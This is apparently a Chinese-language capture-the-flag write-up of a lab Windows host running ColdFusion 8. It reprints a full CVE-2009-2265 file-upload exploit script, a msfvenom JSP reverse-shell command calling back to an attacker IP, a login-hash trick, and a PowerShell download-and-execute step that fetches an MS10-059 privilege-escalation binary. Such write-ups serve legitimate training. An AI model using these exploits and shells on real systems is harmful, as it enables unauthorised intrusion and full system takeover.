基本信息

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nmap -sC -sV -Pn 10.10.10.11
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 13:58 CST
Nmap scan report for 10.10.10.11
Host is up (0.068s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.15 seconds

8500

直接访问是两个目录,/CFIDE/administrator目录是登录页面,根据页面信息是ColdFusion 8:

ColdFusion

这个版本的ColdFusion有两种打法,一个是直接未授权上传jsp后去访问出发shell,另一种是任意文件读取拿到密码hash后解出来密码,登录进去上传shell:

任意文件读取

读取出密码hash,解出来密码,用户名就是admin:

另外如果解不出来明文密码,也可以直接使用hash生成登录用hash:

1
hex_hmac_sha1(document.loginform.salt.value, '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03');

登录进去,add new scheduled/task那里可以上传jsp,然后再去前面的目录里找到上传的文件访问触发(网页加载太慢了,用另一种方式打了):

任意文件上传/rce

论坛里给了脚本:

1
2
3
4
5
6
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.6 lport=4445 -f raw > miao.jsp

$ python exp.py 10.10.10.11 8500 ./miao.jsp
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jsp

然后去访问触发,getshell:

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/python
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import requests, sys

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        path = sys.argv[3]
        with open(sys.argv[4], 'r') as payload:
            body=payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'r') as payload:
            body=payload.read()
except IndexError:
    print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>'
    print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print 'Sending payload...'

try:
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploit.jsp%00", files={'newfile': ('exploit.txt', body, 'application/x-java-archive')}, timeout=30)
    if req.status_code == 200:
        print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/exploit.jsp'
    else:
        print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
    print 'Failed to upload payload... Request timed out'

user flag

当前shell用户桌面得到user.txt:

提权信息

直接根据systeminfo信息分析提权建议,给出很多,这里选择10-059:

提权

就是把exp传上去执行(直接加载meterpreter然后执行提权模块的话非常快):

1
2
3
4
5
echo $webclient = New-Object System.Net.WebClient >>miao.ps1
echo $url = "http://10.10.14.6:7777/Chimichurri.exe" >>miao.ps1
echo $file = "exploit.exe" >>miao.ps1
echo $webclient.DownloadFile($url,$file) >>miao.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File miao.ps1

root flag

然后直接Administrator用户桌面得到root.txt:

参考资料